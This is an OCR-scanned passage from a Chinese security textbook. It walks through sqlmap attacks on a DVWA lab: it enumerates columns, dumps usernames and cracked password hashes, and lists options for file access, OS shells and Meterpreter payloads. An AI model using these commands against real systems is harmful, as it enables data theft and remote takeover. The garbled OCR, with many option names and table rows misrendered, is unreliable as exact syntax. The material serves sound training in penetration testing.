

图 6-33 ” 枚 举 指定 数据 库 中 的 表 


第 10 步 : 枚 举 指定 表 中 的 所 有 用 户 名 与 密码 。 执 行 如 下 命令 枚 举 指 定 表 中 的 所 有 列 ， 
结果 如 图 6-34 所 示 。 

sqlmap — u "http://10.108.162.164/DVWA - 1. 0. 8/vulnerabilities/sqli/?id = 1&Submit = Submit" 

—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroupl6ss6hk7" - D dvwa - T users - 

— columns 

选项 说 明 如 下 。 

-T: 指定 表 。 

--columns: 枚 举 表 中 的 所 有 列 。 


web server operating system: Windows 


web application technology: Apache 2.4.9, PHP 5.5.12 

back- end DBMS: MySQL 5.0 

[23:11:20] [INFO] fetching columns for table 'users' in database 'dvwa' 
Database: dvwa 

Table: users 

[6 columns] 


|+- + 
I 1 
+ + 
| user | varchar(15) | 
| avatar | varchar(70) | 
| first name | varchar(15) | 
| last name | varchar(15) | 
| password | varchar(32) | 
| user. id int(6 l 
n + 


[23:11:20] [INFO] fetched data logged to text files under '/root/. sqLmap/ output/ 10. 108. 162. 164' 


[*] shutting down at 23:11:20 


rootékali: -# 


6-34 ” 枚 举 指 定 表 中 的 所 有 列 
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我 们 感 兴 趣 的 列 是 user 和 password。 执 行 如 下 命令 将 指定 列 的 内 容 ( 所 有 用 户 名 与 密 
码 ) 提 取出 来 ,SQLmap 会 提问 是 否 破解 密码 , 按 Enter 键 确认 ,结果 如 图 6-35 所 示 。 此 时 ， 
可 以 使 用 admin 账户 登录 系统 。 


root@kali: ~ eoo 


Database: dvwa 
Table: users 


+- 
1 

+ + 

| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 
| gordonb | e99a18c428cb38d5f260853678922603 ( abc123) | 
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | 
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | 
Me 和 + 


[23:12:39] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10,108,162.164/ dul 
Imp/ dvwa/ users. csv' 
[23:12:39] [INFO] fetched data logged to text files under '/root/. sqlmap/ output/ 10. 108. 162. 164' 


[*] shutting down at 23: 12:39 


root&ali: - J 


图 6-35 提取 所 有 用 户 名 与 密码 


sqlmap — u "http://10.108.162.164/DVWA— 1. 0. 8/vulnerabilities/sqli/?id = 1&Submit = Submit" 
—- cookie = "security = low; PHPSESSID = to857ug0p8ksrbroupl6ss6hk7" - D dvwa - T users - C 
user, password -- dump 

选项 说 明 如 下 。 

-C: 指定 列 。 

--dump: 提取 内 容 。 


6.1.5 SQLmap 


SQLmap 是 一 个 强大 免费 开源 的 自动 化 SQL 注入 工具 ,主要 功能 是 扫描 ,发 现 并 利用 
给 定 的 URL 的 SQL 注入 漏洞 。 目 前 支持 的 数据 库 有 MySQL, Oracle, PostgreSQL, 
Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase, SAP MaxDB。SQLmap 
采用 四 种 独特 的 SQL 注入 技术 : DAHEIM SQL 注入 ; QUNION 查询 SQL 注入 ; OHA 
ij; 四 基于 时 间 的 SQL 盲 注入 。 其 广泛 的 功能 和 选项 包括 数据 库 指纹 、 枚 举 、 数 据 库 提 取 、 
访问 目标 文件 系统 ,并 在 获取 完全 操作 权限 时 实行 任意 命令 。 

SQLmap 命令 选项 被 归 类 为 目标 、 请 求 . 优 化 、 注 入、 检测 ,技巧 (Techniques)、 指 纹 、 枚 
举 等 选项 。 

SQLmap 命令 语法 如 下 : 


sqlmap [options] (-u «URL» | -g<google dork» | -c < config file>} 


SQLmap 命令 Options( 选 项 ) 说 明 见 表 6-3— 4€ 6-16, 
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表 6-3 SQLmap 命令 选项 : Target( 目 标 ) 
选 项 说 明 
-d DIRECT 直接 连接 到 数据 库 的 连接 字符 串 


-u URL, --url- URL 目标 URL( 例 如 : "http://www. site. com/vuln. php? id—1") 
从 Burp 或 WebScarab 日 志 中 解析 目标 ,可 以 直接 把 Burp proxy 或 者 


-1 LIST WebScarab proxy 中 的 日 志 直 接 倒 出 来 交 给 SQLmap 来 一 个 一 个 检测 是 否 有 
注入 

-x SIT EMAPURL 从 远程 站 点 地 图 (XML) 文 件 解 析 目 标 

-m BULKFILE 扫描 一 个 文本 文件 中 给 出 的 多 个 目标 


从 一 个 文件 中 加 载 HTTP 请 求 ,SQLmap 可 以 从 一 个 文本 文件 中 获取 HTTP 
请 求 ,这样 就 可 以 跳 过 设置 一 些 其 他 参数 (比如 cookie, POST 数据 ,等 等 ) 

将 Google dork 的 处 理 结果 作为 目标 URL,SQLmap 可 以 测试 注入 Google 的 
搜索 结果 中 的 GET 参数 (只 获取 前 100 个 结果 ) ,此 功能 很 强大 

-c CONFIGFILE 从 INI 配置 文件 中 加 载 选 项 


-r REQUESTFILE 


-g GOOGLEDORK 


提示 : Target 至 少 需要 指定 其 中 一 个 选项 ,用 来 设置 目标 URL。 
表 6-4 SQLmap 命令 选项 : Request( 请 求 ) 

选 项 说 o 明 
--method— METHOD HTTP 方法 ,GET 或 POST( 默 认 : GET) 
通过 POST 发 送 的 数据 字符 串 ,此 参数 是 把 数据 以 POST 方式 提交 ， 
sqlmap 会 像 检 测 GET 的 参数 一 样 检测 POST 的 参数 
用 于 分 割 参 数值 的 字符 , 当 GET 或 POST 的 数据 需要 用 其 他 字符 分 割 测 
试 参数 时 ,需要 用 到 此 参数 
这 个 参数 在 以 下 两 个 方面 很 有 用 : (D Web 应 用 需要 登录 时 ; @ 想 要 在 这 
些 头 参 数 中 测试 SQL 注入 时 ,可 以 通过 抓 包 把 Cookie 获取 到 ,复制 出 来 ， 
然后 加 到 - -cookie 参数 里 。 在 HTTP 请 求 中 如 果 遇 到 Set-Cookie, 
SQLmap 会 自动 获取 并 且 在 以 后 的 请 求 中 加 入 ,并 且 会 尝试 SQL 注入 。 
如 果 不 想 接受 Set-Cookie, "T LA fii H]- -drop-set-cookie 参数 来 拒 接 。 当 使 
用 --cookie 参数 时 ,在 返回 一 个 Set-Cookie 头 时 ,SQLmap 会 询问 用 户 用 
哪个 Cookie 来 继续 接 下 来 的 请 求 。 当 --level 的 参数 设 定 为 2 或 者 2 以 上 
时 ,SQLmap 会 尝试 注入 Cookie 参数 


--data- DATA 


--param-del — PARAMETER 


--cookie—- COOKIE 
--load-cookies 
--drop-set-cookie 


--cookie-del 2 COOKIE 用 于 分 割 Cookie 值 的 字符 
--referer= REFERER 指定 HTTP Referer 头 
--drop-set-cookie 忽略 响应 报 文 中 的 Set-Cookie 头 信息 


指定 HTTP User-Agent 头 。 默 认 情 况 下 SQLmap 的 HTTP 请 求 头 中 
User-Agent 值 是 : sqlmap/1. 0-dev-xxxxxxx (http://sqlmap. org) 。 可 以 
--user-agent — AGENT 使 用 --user-anget 参数 来 修改 ,同时 也 可 以 使 用 --random-agnet 参数 来 随 
机 地 从 . /txt/user-agents. txt 中 获取 。 当 --level 参数 设 定 为 3 或 者 3 以 上 
时 ,会 尝试 对 User-Agent 进行 注入 

--random-agent 使 用 随机 选 定 的 HTTP User - Agent 头 

--host= HOST HTTP 主机 头 值 

指定 HTTP Referer 头 。SQLmap 可 以 在 请 求 中 伪造 HTTP 中 的 
referer, 当 --level 参数 设 定 为 3 或 者 3 以 上 时 ,会 尝试 对 referer 注入 


--referer= REFERER 
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选 项 


说 明 


-H HEADER 


额外 的 HTTP 头 部 (例如 : "X-Forwarded-For: 127.0.0.1") 


--headers= HEADERS 


额外 的 HTTP 头 部 (例如 : "Accept-Language: fr\nETag: 123") 


--auth-type 一 ATYPE 


HTTP 身份 验证 类 型 (Basic、Digest.NTLM 或 PKD 


--auth-cred — ACRED 


HTTP £ £j riE f£ (name: password) 


--auth-cert 


34 Web 服务 器 需要 客户 端 证 书 进行 身份 验证 时 ,需要 提供 两 个 文件 : 
key_file,cert_file。key_file 是 格式 为 PEM 文件 ,包含 着 用 户 的 私 钥 ,cert_ 
file 是 格式 为 PEM 的 连接 文件 


--proxy— PROXY 


使 用 HTTP 代理 连接 到 目标 URL 


--proxy-cred — PCRED 


HTTP 代理 身份 验证 凭据 (name:password) 


--ignore-proxy 


忽略 系统 默认 的 HTTP 代理 


--delay - DELAY 


可 以 设 定 两 个 HTTP(S) 请 求 间 的 延迟 , 设 定 为 0. 5 时 是 半 秒 ,默认 是 没有 
延迟 的 ,单位 为 秒 


--timeout — TIMEOUT 


等 待 连接 超时 的 时 间 ( 默 认为 30 秒 ) ,单位 为 秒 


--retries= RETRIES 


连接 超时 后 重新 尝试 连接 的 次 数 (默认 为 3) 


--randomize 


可 以 设 定 某 一 个 参数 值 在 每 一 次 请 求 中 随机 的 变化 ,长 度 和 类 型 会 与 提供 
的 初始 值 一 样 


--safe-url - SAFURL 
--safe-req= SAFEREQ 


有 的 Web 应 用 程序 会 在 用 户 多 次 访问 错误 的 请 求 时 屏蔽 掉 以 后 的 所 有 请 
求 ,这 样 在 SQLmap 进行 探测 或 者 注入 时 可 能 造成 错误 请 求 而 触发 这 个 策 
略 , 导 致 以 后 无 法 进行 。 绕 过 这 个 策略 有 两 种 方式 : 

(1) --safe-url: 提供 一 个 安全 不 错误 的 连接 ,每 隔 一 段 时 间 都 会 去 访问 一 下 
(2) --safe-freq: 提供 一 个 安全 不 错误 的 连接 ,每 次 测试 请 求 之 后 都 会 再 访 
间 一 边 安全 连接 


--skip-urlencode 


根据 参数 位 置 , 它 的 值 默 认 将 会 被 URL 编码 ,但 是 有 些 时 候 后 端的 Web HE 
务 器 不 遵守 RFC 标准 ,只 接受 不 经 过 URL. 编码 的 值 ,这 时 候 就 需要 用 
--skip-urlencode 参数 


--eval= EVALCODE 


在 有 些 时 候 ,需要 根据 某 个 参数 的 变化 而 修改 另 一 个 参数 ,才能 形成 正常 的 
请 求 , 这 时 可 以 用 --eval 参数 在 每 次 请 求 时 根据 所 写 的 python 代码 做 完 修 
改 后 再 请 求 


提示 : Request 中 的 这 些 选 项 可 以 用 来 指定 如 何 连 接 到 目标 URL。 


选 项 


表 6-5 SQLmap 命令 选项 : Optimization( 优 化 ) 
说 明 


-0 


开启 所 有 优化 开关 


--predict-output 


预测 常见 的 查询 输出 


--keep-alive 


使 用 持久 的 HTTP 连接 


--null-connection 


从 没有 实际 的 HTTP 响应 报 文中 获取 页 面 长 度 


--threads— THREADS 


最 大 的 HTTP 并 发 请 求 数量 (默认 为 D 


提示 : Optimization 中 的 这 些 选项 可 用 于 优化 SQLmap 的 性 能 。 
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表 6-6 SQLmap 命令 选项 : Injection( 注 入 ) 
说 o 9 


-p TESTPARAMETER 


可 测试 的 参数 。SQLmap 默认 测试 所 有 的 GET 和 POST 参数 , 当 --level 的 
值 大 于 等 于 2 时 ,也 会 测试 HTTP Cookie 头 的 值 ; 当 大 于 等 于 3 时 ,也 会 测 
试 User-Agent 和 HTTP Referer 头 的 值 。 但 是 可 以 手动 用 -p 参数 设置 想 要 
测试 的 参数 。 例 如 : -p "id,useranget"。 

当 使 用 --level 的 值 很 大 但 是 有 个 别 参数 不 想 测试 时 ,可 以 使 用 --skip 参数 。 


例如 : --skip— "user-angent. referer" 


--dbms— DBMS 


强制 设置 后 端的 DBMS, 默 认 情 况 下 SQLmap 会 自动 地 探测 Web 应 用 后 端 
的 数据 库 是 什么 


--os 一 OS 


强制 设置 后 端 DBMS 操作 系统 ,默认 情况 下 SQLmap 会 自动 地 探测 数据 库 
服务 器 系统 ,支持 的 系统 有 Linux, Windows 


--invalid-bignum 


指定 无 效 的 大 数字 。 当 想 指定 一 个 报错 的 数值 时 ,可 以 使 用 这 个 参数 ,例如 
默认 情况 下 id— 13. SQLmap ZÆ id— — 13 来 报错 ,可 以 指定 比如 id 一 
9999999 来 报错 


--invalid-logical 


指定 无 效 的 逻辑 。 原 因 同上 ,可 以 指定 id—13 把 原来 的 id 一 一 13 的 报错 改 
成 id 一 13 AND 18 一 19 


--prefix— PREFIX 


注入 payload 前 级 字符 串 。 在 有 些 环境 中 ,需要 在 注 和 的 payload 前 面 或 者 后 面 
加 一 些 字符 来 保证 payload 的 正常 执行 。 例 如 ,代码 中 是 这 样 调用 数据 库 的 ， 

$ query = "SELECT * FROM users WHERE id—('". $ GET['id']. "^ 
LIMIT 0, 1"; 

这 时 就 需要 --prefix 和 --suffix 参数 了 : 

root(2 kali; ~ # sqlmap -u "http://192. 168. 136. 131/sqlmap/mysql/get 
str brackets. php? id— 1" -p id --prefix "')" --suffix "AND C'abc'— 'abc" 
这 样 执行 的 SQL 语句 变 成 : 

$ query = "SELECT * FROM users WHERE id—('1') <PAYLOAD> 
AND C'abc'— 'abe' LIMIT 0, 1"; 


---suffix— SUFFIX 


注入 payload 后 缀 字符 串 


--tamper= TAMPER 


修改 注入 的 数据 。SQLmap 除了 使 用 CHARO 函数 来 防止 出 现 单 引 号 之 
外 ,没有 对 注入 的 数据 修改 ,可 以 使 用 --tamper 参数 对 数据 做 修改 来 绕 过 
WAF 等 设备 


提示 : Injection 中 的 这 些 选 项 可 以 用 来 指定 测试 哪些 参数 ,提供 自 定 义 的 注入 


payloads。 


表 6-7 SQLmap 命令 选项 : Detection( 检 测 ) 
说 明 


--level= LEVEL 


执行 测试 的 等 级 (1 一 5, 默 认为 1)。SQLmap 使 用 的 payload 可 以 在 
xml/payloads. xml 中 看 到 ,也 可 以 根据 相应 的 格式 添加 用 户 自己 的 
payload。 这 个 参数 不 仅 影响 使 用 哪些 payload, 同 时 也 会 影响 测试 的 注 
AJ GET 和 POST 的 数据 都 会 测试 , HTTP Cookie 在 level 为 2 时 就 
会 测试 ,HTTP User-Agent/Referer 头 在 level 为 3 时 就 会 测试 。 总 之 
在 用 户 不 确定 哪个 payload 或 者 参数 为 注入 点 时 ,为 了 保证 全 面 性 , 建 
议 使 用 高 的 level fft 
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选 项 说 H 
执行 测试 的 风险 (0 一 3, 默 认为 D. 1 会 测试 大 部 分 的 测试 语句 ; 2 会 
增加 基于 事件 的 测试 语句 ; 3 会 增加 OR 语句 的 SQL 注入 测试 。 在 有 
--risk 一 RISK 些 时 候 ,例如 在 UPDATE 的 语句 中 注入 一 个 OR 的 测试 语句 ,可 能 导 


致 更 新 的 整个 表 , 可 能 造成 很 大 的 风险 。 测 试 的 语句 同样 可 以 在 xml/ 
payloads. xml 中 找到 ,也 可 以 自行 添加 payload 


--string= STRING 


查询 为 真 时 在 页 面 匹配 字符 串 。 默 认 情况 下 SQLmap 通过 判断 返回 页 
面 的 不 同 来 判断 真 假 , 但 有 时 候 这 会 产生 误差 ,因为 有 的 页 面 在 每 次 刷 
新 时 都 会 返回 不 同 的 代码 ,比如 页 面 当 中 包含 一 个 动态 的 广告 或 者 其 
他 内 容 , 这 会 导致 SQLmap 的 误 判 。 此 时 用 户 可 以 提供 一 个 字符 串 或 
者 一 段 正则 匹配 ,在 原始 页 面 与 真 条 件 下 的 页 面 都 存在 的 字符 申 , 而 错 
误 页 面 中 不 存在 (使 用 - -string 参数 添加 字符 串 , 用 - -regexp 参数 可 以 
添加 正则 表达 式 ), 同 时 用 户 可 以 提供 一 段 字 符 串 在 原始 页 面 与 真 条 件 
下 的 页 面 都 不 存在 的 字符 串 ,而 错误 页 面 中 存在 的 字符 串 (- -notrstring 
添加 )。 用 户 也 可 以 提供 真 与 假 条 件 返 回 的 HTTP 状态 码 不 一 样 来 注 
入 ,例如 ,响应 200 时 为 真 ,响应 401 时 为 假 , 可 以 添加 参数 --code 一 200 


--not-string= NOTSTRING 


查询 为 假 时 在 页 面 匹配 字符 串 


--regexp— REGEXP 


查询 时 有 效 时 在 页 面 匹 配 正则 表达 式 


--code 一 CODE 


查询 为 真 时 匹配 的 HTTP 代码 


--text-only 
--titles 


仅 基于 在 文本 内 容 比 较 网 页 。 有 些 时 候 用 户 知 道真 条 件 下 的 返回 页 面 
与 假 条 件 下 返回 页 面 的 不 同位 置 在 哪里 ,可 以 使 用 --text-only(HTTP 
响应 体 中 不 同 )--titles(HTML 的 title 标签 中 不 同 ) 


提示 : Detection 中 的 这 些 选 项 可 以 用 来 指定 在 SQL 盲 注入 时 如 何 解 析 和 比较 HTTP 


响应 页 面 的 内 容 。 


表 6-8 SQLmap 命令 选项 : Techniques( 技 巧 ) 
说 明 


--technique= TECH 


SQL 注入 技术 测试 (默认 BEUST) 。 这 个 参数 可 以 指定 SQLmap 使 用 的 探 
测 技术 ,默认 情况 下 会 测试 所 有 的 方式 。 支 持 的 探测 方式 如 下 。 

B: Boolean-based blind SQL injection( 布 尔 型 注入 ) 

E: Error-based SQL injection( 报 错 型 注入 ) 

U: UNION query SQL injection( 可 联合 查询 注入 ) 

S: Stacked queries SQL injection( 可 多 语句 查询 注入 ) 

T: Time-based blind SQL injection( 基 于 时 间 延 迟 注入 ) 


--time-sec— TIMESEC 


DBMS 响应 的 延迟 时 间 ( 默 认为 5 秒 ) 


--union-cols — UCOLS 
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用 于 测试 UNION 查询 注入 的 列 范围 。 默 认 情 况 下 SQLmap 测试 UNION 
查询 注入 会 测试 1 一 10 个 字段 数 , 当 --level 为 5 时 会 增加 测试 到 50 个 字段 
数 。 设 定 --union-cols 的 值 应 该 是 一 段 整数 ,如 2 一 9 是 测试 2 一 9 个 字段 数 
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选 


项 


说 H 


--union-char 


默认 情况 下 SQLmap 针对 UNION 查询 的 注入 会 使 用 NULL 字符 ,但 是 有 
些 情 况 下 会 造成 页 面 返回 失败 ,而 一 个 随机 整数 是 成 功 的 ,这 是 可 以 用 
--union-char 指定 UNION 查询 的 字符 


--second-order 


有 些 时 候 注 入 点 输入 的 数据 看 返回 结果 的 时 候 并 不 是 当前 的 页 面 ,而 是 另 
外 的 一 个 页 面 ,这 时 候 就 需要 指定 到 哪个 页 面 获取 响应 判断 的 真 假 。 
--second-order 后 门 要 跟 一 个 判断 页 面 的 URL 地 址 


提示 : Techniques 中 的 这 些 选项 可 用 于 调整 具体 的 SQL 注入 测试 。 


选 


项 


表 6-9 SQLmap 命令 选项 : Enumeration( 枚 举 ) 
Wi" 


-b, --banner 


检索 DBMS 的 标识 。 大 多 数 的 数据 库 系统 都 有 一 个 函数 可 以 返回 数据 库 
的 版 本 号 ,通常 这 个 函数 是 version() 或 者 变量 @@version, 这 主要 取决 于 是 
什么 数据 库 


--current-user 


检索 DBMS 的 当前 用 户 


--current-db 


检索 DBMS 的 当前 数据 库 


--hostname 


检索 DBMS 服务 器 的 主机 名 


--is-dba 


检测 DBMS 当前 用 户 是 否 是 DBA 


--users 


TO DBMS 的 用 户 


--passwords 


枚 举 DBMS 用 户 的 密码 哈 希 (password hash)。 当 前 用 户 有 权限 读 取 包 含 
用 户 密码 的 相应 权限 时 ,SQLmap 会 先 列举 出 用 户 , 然 后 列 出 hash, 并 尝试 
破解 


--privileges 


枚 举 DBMS 用 户 的 权限 。 当 前 用 户 有 权限 读 取 包 含 所 有 用 户 的 表 的 权限 
时 ,很 可 能 列举 出 每 个 用 户 的 权限 ,SQLmap 将 会 告诉 用 户 哪 个 是 数据 库 的 
超级 管理 员 。 也 可 以 用 -U 参数 指定 想 看 哪个 用 户 的 权限 


--roles 


列 出 数据 库 管理 员 角 色 。 当 前 用 户 有 权限 读 取 包 含 所 有 用 户 的 表 的 权限 
时 ,很 可 能 列举 出 每 个 用 户 的 角色 ,也 可 以 用 -U 参数 指定 想 看 哪个 用 户 的 
角色 


--dbs 


枚 举 DBMS 数据 库 。 当 前 用 户 有 权限 读 取 包 含 所 有 数据 库 列 表 信 息 的 表 
中 时 , 即 可 列 出 所 有 的 数据 库 


--tables 


枚 举 DBMS 数据 库 中 的 表 。 当 前 用 户 有 权限 读 取 包 含 所 有 数据 库 表 信息 
的 表 中 时 , 即 可 列 出 一 个 特定 数据 的 所 有 表 。 如 果 用 户 不 提供 -D 参数 来 指 
定 一 个 数据 时 ,sqlmap 会 列 出 数据 库 所 有 库 的 所 有 表 。 
--exclude-sysdbs 参数 是 指 包 含 了 所 有 的 系统 数据 库 。 需 要 注意 的 是 ,在 
Oracle 中 需要 提供 的 是 TABLESPACE_NAME, 而 不 是 数据 库 名 称 


--columns 


枚 举 DBMS 数据 库 中 的 表 的 列 。 当 前 用 户 有 权限 读 取 包 含 所 有 数据 库 表 
信息 的 表 时 , 即 可 列 出 指定 数据 库 表 中 的 字段 ,同时 也 会 列 出 字段 的 数据 类 
型 。 如 果 没 有 使 用 -D 参数 指定 数据 库 时 ,默认 会 使 用 当前 数据 库 


--schema 


用 户 可 以 用 此 参数 获取 数据 库 的 架构 ,包含 所 有 的 数据 库 、 表 和 字段 ,以 及 
各 自 的 类 型 。 加 上 --exclude-sysdbs 参数 ,将 不 会 获取 数据 库 自 带 的 系统 库 
内 容 
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选 项 


续 表 
说 明 


--count 


获取 表 中 数据 个 数 。 有 时 候 用 户 只 想 获取 表 中 的 数据 个 数 而 不 是 具体 的 内 
容 , 那 么 就 可 以 使 用 这 个 参数 


--dump 


--dump、-C、-T、-D、--start、--stop、--first、--last。 转 储 DBMS 数据 库 中 的 表 
项 。 如 果 当 前 管理 员 有 权限 读 取 数 据 库 其 中 的 一 个 表 , 那 么 就 能 获取 整个 
表 的 所 有 内 容 。 使 用 -D、-T 参数 指定 想 要 获取 哪个 库 的 哪个 表 , 不 使 用 -D 
参数 时 ,默认 使 用 当前 库 。 可 以 获取 指定 库 中 的 所 有 表 的 内 容 , 只 用 -dump 
跟 -DD 参数 (不 使 用 -T 与 -C 参数 )。 也 可 以 用 -dump 跟 -C 获取 指定 的 字段 内 
容 。SQLmap 为 每 个 表 生 成 了 一 个 CSV 文件 。 如 果 只 想 获 取 一 段 数据 ,可 
以 使 用 --start 和 --stop 参数 ,例如 ,只 想 获取 第 一 段 数据 ,可 使 用 --stop 1; 
如 果 想 获取 第 二 有 段 与 第 三 段 数据 ,使 用 参数 --start 1 --stop 3。 也 可 以 用 -- 
first 与 --last 参数 ,获取 第 几 个 字符 到 第 几 个 字符 的 内 容 。 如 果 想 获取 字段 
中 第 三 个 字符 到 第 五 个 字符 的 内 容 ,使 用 --first 3 --last 5, 该 方法 只 在 育 注 
时 使 用 ,因为 其 他 方式 可 以 准确 地 获取 注入 内 容 , 不 需要 一 个 字符 一 个 字符 
地 猜 解 


--dump-all 


转 储 DBMS 中 所 有 的 数据 库 中 的 表 项 。 使 用 --dump-all 参数 获取 所 有 数据 
库 表 的 内 容 , 同 时 加 上 - -exclude-sysdbs 则 只 获取 用 户 数据 库 的 表 , 需 要 注 
意 在 Microsoft SQL Server 中 master 数据 库 没 有 考虑 成 为 一 个 系统 数据 
库 , 因 为 有 的 管理 员 会 把 其 当 作 普通 数据 库 一 样 来 使 用 它 


--search 


--search,-C,-T,-D, 18 4 5E BE R MRE. - search 可 以 用 来 寻找 特定 的 
数据 库 名 、 所 有 数据 库 中 的 特定 表 名 ,以 及 所 有 数据 库 表 中 的 特定 字段 

可 以 在 以 下 三 种 情况 下 使 用 : 

-C 后 跟着 用 逗号 分 隔 的 列 名 ,将 会 在 所 有 数据 库 表 中 搜索 指定 的 列 名 

-T 后 跟着 用 逗号 分 隔 的 表 名 ,将 会 在 所 有 数据 库 中 搜索 指定 的 表 名 

-D 后 跟着 用 逗号 分 隔 的 库 名 ,将 会 在 所 有 数据 库 中 搜索 指定 的 库 名 


-D DB 


要 进行 枚 举 的 数据 库 名 


-T TBL 


要 进行 枚 举 的 数据 库 表 名 


-C COL 


要 进行 枚 举 的 数据 库 表 中 列 名 


-U USER 


要 进行 枚 举 的 DBMS 用 户 


--exclude-sysdbs 


枚 举 表 时 ,不 包含 DBMS 系统 数据 库 


--start= LIMITSTART 


进行 转 储 的 第 一 个 表 项 


--stop 一 LIMITSTOP 


进行 转 储 的 最 后 一 个 表 项 


--sglquery— QUERY 


要 执行 的 SQL 语句 。SQLmap 会 自动 检测 具体 使 用 哪 种 SQL 注入 技术 ,如 
何 插入 检索 语句 。 如 果 是 SELECT 查询 语句 ,SQLmap 将 会 输出 结果 。 如 
果 是 通过 SQL 注入 执行 其 他 语句 ,需要 测试 是 否 支持 多 语句 执行 SQL 
语句 


--sql-shell 
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交互 式 SQL 的 Shell 提示 符 
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提示 : Enumeration 中 的 这 些 选 项 可 以 用 来 列举 后 端 数 据 库 管理 系统 的 信息 、 表 中 的 


结构 和 数据 。 


表 6-10 SQLmap 命令 选项 : Brute force( 暴 力 ) 
说 明 


--common-tables 


暴力 破解 表 名 。 当 使 用 --tables 无 法 获取 到 数据 库 的 表 时 ,可 以 使 用 此 参数 。 通 
常 是 如 下 情况 : 

(1) MySQL 数据 库 版 本 小 于 5.0, 没 有 information schema X. 

(2) 数据 库 是 Microsoft Access, 系 统 表 MSysObjects 是 不 可 读 的 (默认 )。 

G) 当前 用 户 没 有 权限 读 取 系 统 中 保存 数据 结构 的 表 的 权限 。 

暴力 破解 的 表 在 txt/common-tables. txt 文件 中 ,可 以 自己 添加 


--common-columns 


暴力 破解 列 名 。 与 暴力 破解 表 名 一 样 ,暴力 破解 的 列 名 在 txt/common-columns. 
txt 中 


提示 : Brute force 中 的 这 些 选 项 可 被 用 来 运行 暴力 检查 。 


表 6-11 SQLmap 命令 选项 : User-defined function injection( 用 户 自 定义 函数 注入 ) 
选 项 说 å 
注入 用 户 自 定义 函数 。 可 以 通过 编译 MySQL 注入 自 定义 的 函数 (UDFs) 或 
dicen PostgreSQL 在 Windows É) Jt 3X FE, DLL 或 者 Linux/UNIX 中 共享 的 对 象 ， 
--udf-injec 


SQLmap 将 会 问 一 些 问 题 , 上 传 到 服务 器 数据 库 自 定义 函数 ,然后 根据 选择 执行 
这 些 函 数 , 当 用 户 注入 完成 后 ,SQLmap 将 会 移 除 这 些 函 数 


--shared-lib=SHLIB 


共享 库 的 本 地 路 径 


提示 : User-defined function injection 中 的 这 些 选项 可 以 用 来 创建 用 户 自 定义 函数 。 
表 6-12 SQLmap 命令 选项 : File system access( 访 问 文件 系统 ) 


选 项 


说 明 


--file-read= RFILE 


从 数据 库 服 务 器 中 读 取 文件 。 数据库 可 以 为 MySQL. PostgreSQL 或 Microsoft 
SQL Server, 并 且 当 前 用 户 有 权限 使 用 特定 的 函数 。 读 取 的 文件 可 以 是 文本 也 
可 以 是 二 进 制 文件 


--file-write— WFILE 


把 文件 上 传 到 数据 库 服务 器 中 。 数据库 可 以 为 MySQL, PostgreSQL. 或 
Microsoft SQL Server, 并 且 当 前 用 户 有 权限 使 用 特定 的 函数 。 上 传 的 文件 可 以 
是 文本 也 可 以 是 二 进 制 文件 


--file-dest— DFILE 


要 上 传 的 文件 在 数据 库 服务 器 中 的 绝对 路 径 


提示 : File system access 中 的 这 些 选项 可 以 用 来 访问 后 端 数据 库 管理 系统 的 底层 文件 


系统 。 
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表 6-13 SQLmap 命令 选项 : Operating system access( 操 作 系 统 访问 ) 
选 项 说 明 
执行 一 条 操作 系统 命令 。 数 据 库 可 以 为 MySQL. PostgreSQL 或 Microsoft 
SQL Server. 并 且 当 前 用 户 有 权限 使 用 特定 的 函数 。 在 MySQL. 
PostgreSQL 中 ,sqlmap 会 上 传 一 个 二 进 制 库 , 包 含 用 户 自 定义 的 函数 sys_ 
--os-cmd 二 OSCMD exec() 和 sys_eval()。 这 两 个 函数 可 以 执行 系统 命令 。 在 Microsoft SQL 
Server 中 , SQLmap 将 会 使 用 xp_cmdshell 存储 过 程 , 如 果 被 禁用 (在 
Microsoft SQL Server 2005 及 以 上 版 本 默认 禁用 ) ,SQLmap 会 重新 启用 它 ， 
如 果 不 存在 ,会 自动 创建 
交互 式 操作 系统 的 Shell 提示 符 。 用 --os-Shell 参数 也 可 以 模拟 一 个 真实 的 
Shell, 可 以 输入 用 户 想 执行 的 命令 
OOB Shell, Meterpreter 或 VNC 的 提示 符 。 
可 以 与 Meterpreter 配合 使 用 。 
参数 : --os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path 
当 数据 库 为 MySQL, PostgreSQL 或 Microsoft SQL Server. 并且 当前 用 户 
有 权限 使 用 特定 的 函数 ,可 以 在 数据 库 与 攻击 者 之 间 直 接 建 立 TCP 连接 ， 
这 个 连接 可 以 是 一 个 交互 式 命令 行 的 Meterpreter 会 话 ,SQLmap 会 根据 
Metasploit 生成 shellcode, 并 有 以 下 四 种 方式 执行 它 。 
CD 通过 用 户 自 定义 的 sys_bineval() 函 数 在 内 存 中 执行 Metasplit 的 
shellcode, 支 持 MySQL 和 PostgreSQL 数据 库 ,参数 为 --os-pwn。 
(2) 通过 用 户 自 定义 的 函数 上 传 一 个 独立 的 payload 函数 , MySQL 和 
PostgreSQL 中 为 sys_exec() 函数 ,Microsoft SQL Server 中 为 xp_cmdshell 
〇 函数 ,参数 为 --0s-pwn。 
(3) 通过 SMB 攻击 (MS08-068) 来 执行 Metasploit 的 shellcode, 当 SQLmap 
获取 到 的 权限 足够 高 时 (Linux/UNIX 的 uid — 0. Windows 是 
Administrator) ,参数 为 1- -os-smbrelay。 
(4) 通过 溢出 Microsoft SQL Server 2000 和 2005 版 本 的 sp. 
replwritetovarbin ff fif i f& ( MS09-004), 在 内 存 中 执行 Metasploit 的 
payload ,参数 为 --os-bof 
--os-smbrelay 一 键 获 取 一 个 OOB Shell, Meterpreter 或 VNC 
--os-bof 存储 过 程 缓冲 区 的 溢出 利用 
--priv-esc 数据 库 进程 用 户 权 限 的 提升 
--msf-path— MSFPATH | Metasploit Framework 在 本 地 的 安装 路 径 
--tmp-path 一 TMPPATH | 远程 临时 文件 目录 的 绝对 路 径 


--os-shell 


--os-pwn 


提示 : Operating system access 中 的 这 些 选项 可 以 用 于 访问 后 端 数据 库 管理 系统 的 底 
层 操作 系统 。 


36-14. SOLmap 命令 选项 : Windows 注册 表 的 访问 


选 项 说 明 
